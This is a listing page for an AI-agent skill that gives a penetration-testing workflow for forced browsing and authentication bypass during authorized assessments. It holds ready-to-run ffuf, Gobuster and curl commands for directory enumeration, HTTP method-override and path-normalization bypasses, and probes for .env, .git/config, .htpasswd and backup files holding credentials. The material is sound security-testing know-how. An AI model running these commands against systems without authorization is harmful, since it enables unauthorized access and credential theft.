bypassing-authentication-with-forced-browsing
Discovering and accessing unprotected pages, APIs, and administrative interfaces by enumerating URLs and bypassing authentication controls during authorized security assessments.
Best use case
bypassing-authentication-with-forced-browsing is best used when you need a repeatable AI agent workflow instead of a one-off prompt.
Discovering and accessing unprotected pages, APIs, and administrative interfaces by enumerating URLs and bypassing authentication controls during authorized security assessments.
Teams using bypassing-authentication-with-forced-browsing should expect a more consistent output, faster repeated execution, less prompt rewriting.
When to use this skill
- You want a reusable workflow that can be run more than once with consistent structure.
When not to use this skill
- You only need a quick one-off answer and do not need a reusable workflow.
- You cannot install or maintain the underlying files, dependencies, or repository context.
Installation
Claude Code / Cursor / Codex
Manual Installation
- Download SKILL.md from GitHub
- Place it in
.claude/skills/bypassing-authentication-with-forced-browsing/SKILL.mdinside your project - Restart your AI agent — it will auto-discover the skill
How bypassing-authentication-with-forced-browsing Compares
| Feature / Agent | bypassing-authentication-with-forced-browsing | Standard Approach |
|---|---|---|
| Platform Support | Not specified | Limited / Varies |
| Context Awareness | High | Baseline |
| Installation Complexity | Unknown | N/A |
Frequently Asked Questions
What does this skill do?
Discovering and accessing unprotected pages, APIs, and administrative interfaces by enumerating URLs and bypassing authentication controls during authorized security assessments.
Where can I find the source code?
You can find the source code on GitHub using the link provided at the top of the page.
Related Guides
AI Agents for Marketing
Discover AI agents for marketing workflows, from SEO and content production to campaign research, outreach, and analytics.
AI Agents for Startups
Explore AI agent skills for startup validation, product research, growth experiments, documentation, and fast execution with small teams.
AI Agents for Coding
Browse AI agent skills for coding, debugging, testing, refactoring, code review, and developer workflows across Claude, Cursor, and Codex.
SKILL.md Source
# Bypassing Authentication with Forced Browsing
## When to Use
- During authorized penetration tests to discover hidden or unprotected administrative pages
- When testing whether authentication is consistently enforced across all application endpoints
- For identifying backup files, configuration files, and debug interfaces left exposed in production
- When assessing access control on API endpoints that should require authentication
- During security audits to validate that all sensitive resources enforce session validation
## Prerequisites
- **Authorization**: Written penetration testing agreement covering directory enumeration
- **ffuf**: Fast web fuzzer (`go install github.com/ffuf/ffuf/v2@latest`)
- **Gobuster**: Directory brute-force tool (`apt install gobuster`)
- **Burp Suite**: For intercepting and analyzing requests and responses
- **Wordlists**: SecLists collection (`git clone https://github.com/danielmiessler/SecLists.git`)
- **Target access**: Network connectivity and valid test credentials for authenticated comparison
## Workflow
### Step 1: Enumerate Hidden Directories and Files
Use ffuf or Gobuster to discover paths not linked in the application's navigation.
```bash
# Directory enumeration with ffuf
ffuf -u https://target.example.com/FUZZ \
-w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt \
-mc 200,301,302,403 \
-fc 404 \
-o results-dirs.json -of json \
-t 50 -rate 100
# File enumeration with common extensions
ffuf -u https://target.example.com/FUZZ \
-w /usr/share/seclists/Discovery/Web-Content/raft-medium-files.txt \
-e .php,.asp,.aspx,.jsp,.html,.js,.json,.xml,.bak,.old,.txt,.cfg,.conf,.env \
-mc 200,301,302,403 \
-fc 404 \
-o results-files.json -of json \
-t 50 -rate 100
# Gobuster for directory enumeration
gobuster dir -u https://target.example.com \
-w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt \
-s "200,204,301,302,307,403" \
-x php,asp,aspx,jsp,html \
-o gobuster-results.txt \
-t 50
```
### Step 2: Discover Administrative and Debug Interfaces
Target common administrative paths and debug endpoints.
```bash
# Admin panel enumeration
ffuf -u https://target.example.com/FUZZ \
-w /usr/share/seclists/Discovery/Web-Content/common.txt \
-mc 200,301,302 \
-t 50 -rate 100
# Common admin paths to check manually:
# /admin, /administrator, /admin-panel, /wp-admin
# /cpanel, /phpmyadmin, /adminer, /manager
# /console, /debug, /actuator, /swagger-ui
# /graphql, /graphiql, /.env, /server-status
# API endpoint discovery
ffuf -u https://target.example.com/api/FUZZ \
-w /usr/share/seclists/Discovery/Web-Content/api/api-endpoints.txt \
-mc 200,201,204,301,302,401,403 \
-fc 404 \
-o api-results.json -of json
# Check for Spring Boot Actuator endpoints
for endpoint in env health info beans configprops mappings trace; do
curl -s -o /dev/null -w "%{http_code} /actuator/$endpoint\n" \
"https://target.example.com/actuator/$endpoint"
done
```
### Step 3: Test Authentication Enforcement on Discovered Endpoints
Compare responses between unauthenticated and authenticated requests.
```bash
# Test without authentication
curl -s -o /dev/null -w "%{http_code}" \
"https://target.example.com/admin/dashboard"
# Test with valid session cookie
curl -s -o /dev/null -w "%{http_code}" \
-b "session=valid_session_token_here" \
"https://target.example.com/admin/dashboard"
# Automated check: compare response sizes
# Unauthenticated request
curl -s "https://target.example.com/admin/users" | wc -c
# Authenticated request
curl -s -b "session=valid_token" \
"https://target.example.com/admin/users" | wc -c
# If both return similar content, authentication is not enforced
# Test with Burp Intruder: send a list of discovered URLs
# without cookies and flag any 200 responses
```
### Step 4: Test HTTP Method-Based Authentication Bypass
Some applications only enforce authentication for specific HTTP methods.
```bash
# Test different HTTP methods on protected endpoints
for method in GET POST PUT DELETE PATCH OPTIONS HEAD TRACE; do
echo -n "$method: "
curl -s -o /dev/null -w "%{http_code}" \
-X "$method" "https://target.example.com/admin/settings"
done
# Test HTTP method override headers
curl -s -o /dev/null -w "%{http_code}" \
-X POST \
-H "X-HTTP-Method-Override: GET" \
"https://target.example.com/admin/settings"
curl -s -o /dev/null -w "%{http_code}" \
-H "X-Original-Method: GET" \
-H "X-Rewrite-URL: /admin/settings" \
"https://target.example.com/"
```
### Step 5: Test Path Traversal and URL Normalization Bypass
Exploit URL parsing differences to bypass path-based authentication rules.
```bash
# Path normalization bypass attempts
curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/admin/dashboard"
curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/ADMIN/dashboard"
curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/admin/./dashboard"
curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/public/../admin/dashboard"
curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/admin%2fdashboard"
curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/;/admin/dashboard"
curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/admin;anything/dashboard"
curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/.;/admin/dashboard"
# Double URL encoding
curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/%2561dmin/dashboard"
# Trailing characters
curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/admin/dashboard/"
curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/admin/dashboard.json"
curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/admin/dashboard%00"
```
### Step 6: Discover Backup and Configuration Files
Search for sensitive files inadvertently exposed on the web server.
```bash
# Backup file discovery
ffuf -u https://target.example.com/FUZZ \
-w /usr/share/seclists/Discovery/Web-Content/raft-medium-files.txt \
-e .bak,.old,.orig,.save,.swp,.tmp,.dist,.config,.sql,.gz,.tar,.zip \
-mc 200 -t 50 -rate 100
# Common sensitive files
for file in .env .git/config .git/HEAD .svn/entries \
web.config wp-config.php.bak config.php.old \
database.yml .htpasswd server-status phpinfo.php \
robots.txt sitemap.xml crossdomain.xml; do
status=$(curl -s -o /dev/null -w "%{http_code}" \
"https://target.example.com/$file")
if [ "$status" != "404" ]; then
echo "FOUND ($status): $file"
fi
done
# Git repository exposure check
curl -s "https://target.example.com/.git/HEAD"
# If this returns "ref: refs/heads/main", the git repo is exposed
```
## Key Concepts
| Concept | Description |
|---------|-------------|
| **Forced Browsing** | Directly accessing URLs that are not linked but exist on the server |
| **Directory Enumeration** | Brute-forcing directory and file names against a wordlist to discover hidden content |
| **Authentication Bypass** | Accessing protected resources without valid credentials due to missing access checks |
| **Path Normalization** | Exploiting differences in how web servers and application frameworks parse URL paths |
| **Method-based Bypass** | Using alternative HTTP methods (PUT, DELETE) that may not have authentication checks |
| **Information Disclosure** | Exposure of sensitive configuration files, backups, or debug interfaces |
| **Defense in Depth** | Layered security controls where authentication is enforced at multiple levels |
## Tools & Systems
| Tool | Purpose |
|------|---------|
| **ffuf** | Fast web fuzzer for directory, file, and parameter enumeration |
| **Gobuster** | Directory and DNS brute-forcing tool written in Go |
| **Feroxbuster** | Recursive content discovery tool with automatic recursion |
| **DirBuster** | OWASP Java-based directory brute-force tool with GUI |
| **Burp Suite** | HTTP proxy for request interception and automated scanning |
| **SecLists** | Comprehensive collection of wordlists for security testing |
## Common Scenarios
### Scenario 1: Exposed Admin Panel
An admin panel at `/admin/` is only hidden by not being linked in the navigation. Direct URL access reveals the full administrative interface without any authentication check.
### Scenario 2: Unprotected API Endpoints
API endpoints at `/api/v1/users` and `/api/v1/settings` require authentication in the frontend application but the backend API does not enforce session validation, allowing unauthenticated direct access.
### Scenario 3: Backup File Containing Credentials
A developer left `config.php.bak` on the production server. This backup file contains database credentials in plaintext, discovered through extension-based enumeration.
### Scenario 4: Spring Boot Actuator Exposure
The `/actuator/env` endpoint is exposed without authentication, revealing environment variables including database connection strings, API keys, and secrets.
## Output Format
```
## Forced Browsing / Authentication Bypass Finding
**Vulnerability**: Missing Authentication on Administrative Interface
**Severity**: Critical (CVSS 9.1)
**Location**: /admin/dashboard (GET, no authentication required)
**OWASP Category**: A01:2021 - Broken Access Control
### Discovered Unprotected Resources
| Path | Status | Auth Required | Content |
|------|--------|---------------|---------|
| /admin/dashboard | 200 | No | Full admin panel |
| /admin/users | 200 | No | User management |
| /actuator/env | 200 | No | Environment variables |
| /config.php.bak | 200 | No | Database credentials |
| /.git/HEAD | 200 | No | Git repository metadata |
### Impact
- Unauthenticated access to administrative functions
- Ability to create, modify, and delete user accounts
- Exposure of database credentials and API keys
- Full source code disclosure via exposed Git repository
### Recommendation
1. Implement authentication checks at the server/middleware level for all admin routes
2. Remove backup files, debug endpoints, and version control metadata from production
3. Configure web server to deny access to sensitive file extensions (.bak, .old, .env, .git)
4. Implement IP-based access restrictions for administrative interfaces
5. Use a reverse proxy to restrict access to internal-only endpoints
```Related Skills
testing-mobile-api-authentication
Tests authentication and authorization mechanisms in mobile application APIs to identify broken authentication, insecure token management, session fixation, privilege escalation, and IDOR vulnerabilities. Use when performing API security assessments against mobile app backends, testing JWT implementations, evaluating OAuth flows, or assessing session management. Activates for requests involving mobile API auth testing, token security assessment, OAuth mobile flow testing, or API authorization bypass.
testing-api-authentication-weaknesses
Tests API authentication mechanisms for weaknesses including broken token validation, missing authentication on endpoints, weak password policies, credential stuffing susceptibility, token leakage in URLs or logs, and session management flaws. The tester evaluates JWT implementation, API key handling, OAuth flows, and session token entropy to identify authentication bypasses. Maps to OWASP API2:2023 Broken Authentication. Activates for requests involving API authentication testing, token validation assessment, credential security testing, or API auth bypass.
implementing-zero-knowledge-proof-for-authentication
Zero-Knowledge Proofs (ZKPs) allow a prover to demonstrate knowledge of a secret (such as a password or private key) without revealing the secret itself. This skill implements the Schnorr identificati
implementing-passwordless-authentication-with-fido2
Deploy FIDO2/WebAuthn passwordless authentication using security keys and platform authenticators. Covers WebAuthn API integration, FIDO2 server configuration, passkey enrollment, biometric authentica
implementing-hardware-security-key-authentication
Implements FIDO2/WebAuthn hardware security key authentication including registration ceremonies, authentication flows, YubiKey enrollment, and passkey migration strategies. Builds a complete relying party server using the python-fido2 library that supports cross-platform authenticators, resident key (discoverable credential) workflows, and user verification policies. Activates for requests involving FIDO2 implementation, WebAuthn registration, hardware security key enrollment, YubiKey integration, or passkey migration from password-based authentication.
detecting-anomalous-authentication-patterns
Detects anomalous authentication patterns using UEBA analytics, statistical baselines, and machine learning models to identify impossible travel, credential stuffing, brute force, password spraying, and compromised account behaviors across authentication logs. Activates for requests involving authentication anomaly detection, login behavior analysis, UEBA implementation, or suspicious sign-in investigation.
configuring-multi-factor-authentication-with-duo
Deploy Cisco Duo multi-factor authentication across enterprise applications, VPN, RDP, and SSH access points. This skill covers Duo integration methods, adaptive authentication policies, device trust
validating-backup-integrity-for-recovery
Validate backup integrity through cryptographic hash verification, automated restore testing, corruption detection, and recoverability checks to ensure backups are reliable for disaster recovery and ransomware response scenarios.
triaging-vulnerabilities-with-ssvc-framework
Triage and prioritize vulnerabilities using CISA's Stakeholder-Specific Vulnerability Categorization (SSVC) decision tree framework to produce actionable remediation priorities.
triaging-security-incident
Performs initial triage of security incidents to determine severity, scope, and required response actions using the NIST SP 800-61r3 and SANS PICERL frameworks. Classifies incidents by type, assigns priority based on business impact, and routes to appropriate response teams. Activates for requests involving incident triage, security alert classification, severity assessment, incident prioritization, or initial incident analysis.
triaging-security-incident-with-ir-playbook
Classify and prioritize security incidents using structured IR playbooks to determine severity, assign response teams, and initiate appropriate response procedures.
triaging-security-alerts-in-splunk
Triages security alerts in Splunk Enterprise Security by classifying severity, investigating notable events, correlating related telemetry, and making escalation or closure decisions using SPL queries and the Incident Review dashboard. Use when SOC analysts face queued alerts from correlation searches, need to prioritize investigation order, or must document triage decisions for handoff to Tier 2/3 analysts.